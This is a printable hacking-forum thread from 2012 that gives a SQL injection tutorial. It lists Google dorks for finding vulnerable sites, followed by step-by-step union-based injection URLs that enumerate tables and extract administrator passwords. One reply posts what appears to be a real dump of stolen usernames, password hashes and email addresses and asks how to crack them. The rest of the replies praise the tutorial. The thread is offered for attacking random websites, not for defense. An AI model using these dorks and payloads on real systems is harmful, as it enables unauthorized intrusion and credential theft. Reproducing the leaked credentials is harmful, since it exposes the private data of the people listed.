Sinisterly
SQL injection tutorial - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: SQL injection tutorial (/Thread-SQL-injection-tutorial--40790)

Pages: 1 2

SQL injection tutorial - princeshama - 03-27-2012

This is a tutorial for SQL injection
now lets start

Use google to search for dorks

For searching for SQL vulnerable sites,you can use these dork's

Dork: SQL Injection
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurlConfusedhow.php?id=
inurlConfusedtaff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurlConfusedw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurlConfusedql.php?id=
inurl:news_view.php?id=
inurlConfusedelect_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurlConfusedem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurlConfusedhow_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurlConfusedpr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurlConfusedhowimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurlConfusedhop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurlConfusedhopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurlConfusedection.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurlConfusedhredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurlConfusedhop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurlConfusedql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurlConfusedtory.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

injecting a site

now you got your vulnerable site


http://www.site.comnews.php?id=-17' add ' to the end to check if its vulnerable

it gets error,i know its vulnerable so i remove the ' and do

http://www.site.com/news.php?id=17 order by 1--
http://www.site.com/news.php?id=17 order by 2--
http://www.site.com/news.php?id=17 order by 3--

No errors i continue etc etc

i finally get an error when i do like below

http://www.site.com/news.php?id=17 order by 13--

so this tells me 13 columns dont exist,so there must be 12 columns in the database

so next i do the UNION SELECT function as shown below


http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- (note make sure to add a - in between = 17 like =-17 in the ID)


i Hit enter


Numbers 4 and 5 appear,this means data can be extracted from numbers for and five


I Replace 4 in the url with @@version so it now looks like


http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12--



The i hit enter

5.0.32-Debian_7etch8-log


^this is the mysql version running,So its running version 5 that helps alot,(versions 4 and below we have the guess the table name's)


Now

Where we put @@version (4th spot)

Replace it with

group_concat(table_name) <<gets table name

like

http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12--


And at the end of union select string remove the -- after the 12 and add


+from+information_schema.tables+where+table_schema=database()--


So it now looks like

http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--


i Now see


x_admins,x_articles,x_ban,x_banners,x_banners_info,x_comments,x_file_categories,​ ​ x_file_data,x_forum_a,x_forum_b,x_forum_c,x_gbook,x_infopages,x_links_categories​ ​ ,x_links_data,x_mails,x_menu,x_news,x_poll_data,x_poll_desc,x_pw,x_topic,x_users​ ​



Now replace group_Concat(table_name) with group_concat(column_name) and everything after union select 5,6,7,8,9,10,11,12 with
+from+information_schema.columns+where+table_name='x_admins'--

so it goes from

http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--

TO

http://www.site/news.php?id=-17 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 +from+information_schema.columns+where+table_name='x_admins'--

we see id,nick,pass,name,added,access,mail,stat

Learn about grouping at this point but now we add


group_concat(id,0x3a,pass,0x3a,mail) to were the group_concat(column_name) is and add +from+x_admins-- after 10,11,12

So the string becomes

http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(id,0x3a,pass,0x3a,mail),5,6,7,8,9,10,11,12 +from+x_admins--

At this point we obtain the admins password



RE: SQL injection tutorial - grouver08 - 04-22-2012

I tried to follow the tutorial but I receive error... Does that mean the site is no longer vulnerable?

SELECT * FROM news WHERE news_id=-22 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
SELECT command denied to user 'main_wellerpools'@'72.167.232.226' for table 'tables'

RE: SQL injection tutorial - grouver08 - 04-22-2012

1:admin:$P$BVn6ffoysMZIZWl..WeFguFFjfG8rX0:loschi@studioaltermedia.it
2:test:$P$B.pgSzrVT7AChwBS.hHc0x9nVSXvBF1:loschi@iuav.it
3:fabriziogalli:$P$BRozKUfxX/YlD5kwg6.soiU.aMTfLr/:fabriziogalli@infinito.it
7:giuseppe_ridolfi:$P$BDfYuVKqZUVDqCP4tcM1d8D5Agc9I3.:giuseppe.ridolfi@taed.unifi.it
6Confusedpartaco paris:$P$BdrzsFGO/Kusq0ZNawghs98fhVggYM1Confusedpartacoparis@hotmail.com
8:isidoro:$P$B0GTmpOKQwahKr8m4zICPg23cBQdFe0:antonio.lauria@taed.unifi.it
10:Walter Angelico:$P$BH2xBV6eY3K02emxhg8BzpzVvEDcbA0:walterangelico1@tin.it
11:Andrianq:$P$B4S.SWhJiD6CxLlV1mRywf7i3y48kn.:pulvillarrac@gmail.com
12:MikeWink:$P$B8dwPQu/ZVV62Xq256jIldy5z1HxrV/:bugbeemershonyhe@gmail.com
13:UlricheDmond:$P$BtQX0X44HnBZuPuzKaJrYdK/vO/Tjv1:ulrichedmondsuses@gmail.com
14:marco:$P$BYLPKdC3Fy8xmpfX2lW0HmlRRr/IGf/:marco@itrsystem.com
16TongueIPERYJ27:$P$Bw8ZjwnIhIcCxh.ZCK5ZSgD1I/OSh4.TongueIPERYJ27@unique-papers.com
17:wpadmina:$P$BL3g7vYq3xxxMx5PAOxeuFlYaqkyvj0:makilovitalcamader@gmail.com
18:jos:$P$B/XfeEk/xuERa7OFYP2O9duY458Ihi1:john@chetkoe.tv
19:finoli 13


Is there a way to decrypt the password?

RE: SQL injection tutorial - TheSkillfularrow - 04-22-2012

its a very long list, keep it up.

RE: SQL injection tutorial - Kelv1n - 04-24-2012

nice list of dorks.. i bet some people will find this useful

RE: SQL injection tutorial - Hippo - 04-24-2012

yap dorks list amazing, i try it with backtrack sqlmap thanks for share.

RE: SQL injection tutorial - BatTok - 04-24-2012

Nice share mate..Biggrin Thanks you..Smile

RE: SQL injection tutorial - brocca - 04-30-2012

thanks for sharing this bro

RE: SQL injection tutorial - A.W.H - 01-19-2013

Thank you for sharing. Nice and simple to comprehend; the best kind of tutorial.

RE: SQL injection tutorial - A.W.H - 01-19-2013

Thank you for sharing. Nice and simple to comprehend; the best kind of tutorial.